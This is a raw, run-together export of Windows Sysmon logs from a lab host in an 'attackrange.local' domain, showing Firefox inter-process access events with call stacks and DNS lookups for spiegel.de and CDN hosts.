Firefox\xul.dll+2f2561 10341000x800000000000000017836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla 
Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla 
Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.725{59A5CD1D-945A-6005-3305-00000000A301}7052cdn.prod.www.spiegel.de0type: 5 sni.cdn.prod.www.spiegel.de.c.footprint.net;::ffff:8.238.30.122;::ffff:8.238.31.122;::ffff:8.241.78.122;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.536{59A5CD1D-945A-6005-3305-00000000A301}7052aacfb9d106f4.link11.de9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.534{59A5CD1D-945A-6005-3305-00000000A301}7052aacfb9d106f4.link11.de0128.65.210.182;128.65.210.183;128.65.210.184;128.65.210.185;128.65.210.180;128.65.210.181;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.533{59A5CD1D-945A-6005-3305-00000000A301}7052www.spiegel.de0type: 5 aacfb9d106f4.link11.de;::ffff:128.65.210.181;::ffff:128.65.210.182;::ffff:128.65.210.183;::ffff:128.65.210.184;::ffff:128.65.210.185;::ffff:128.65.210.180;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:40.883{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:40.883{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla 
Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:39.272{59A5CD1D-8E56-6005-2E00-00000000A301}2464122.30.238.8.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:39.184{59A5CD1D-8E56-6005-2E00-00000000A301}2464181.210.65.128.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:39.181{59A5CD1D-8E56-6005-2E00-00000000A301}2464193.88.79.104.in-addr.arpa.0type: 12 a104-79-88-193.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.741{59A5CD1D-945A-6005-3305-00000000A301}7052e7808.dscg.akamaiedge.net02a02:26f0:1700:494::1e80;2a02:26f0:1700:483::1e80;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.738{59A5CD1D-945A-6005-3305-00000000A301}7052e7808.dscg.akamaiedge.net0104.79.88.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.738{59A5CD1D-945A-6005-3305-00000000A301}7052sni.cdn.prod.www.spiegel.de.c.footprint.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.738{59A5CD1D-945A-6005-3305-00000000A301}7052assets.adobedtm.com0type: 5 cn-assets.adobedtm.com.edgekey.net;type: 5 e7808.dscg.akamaiedge.net;::ffff:104.79.88.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:38.726{59A5CD1D-945A-6005-3305-00000000A301}7052sni.cdn.prod.www.spiegel.de.c.footprint.net08.238.31.122;8.241.78.122;8.238.30.122;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.746{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.712{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.682{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.665{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.313{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.313{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.309{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.308{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.305{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.239{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.238{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.237{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.237{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.233{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.173{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.173{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla 
Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla 
Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:41.012{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla 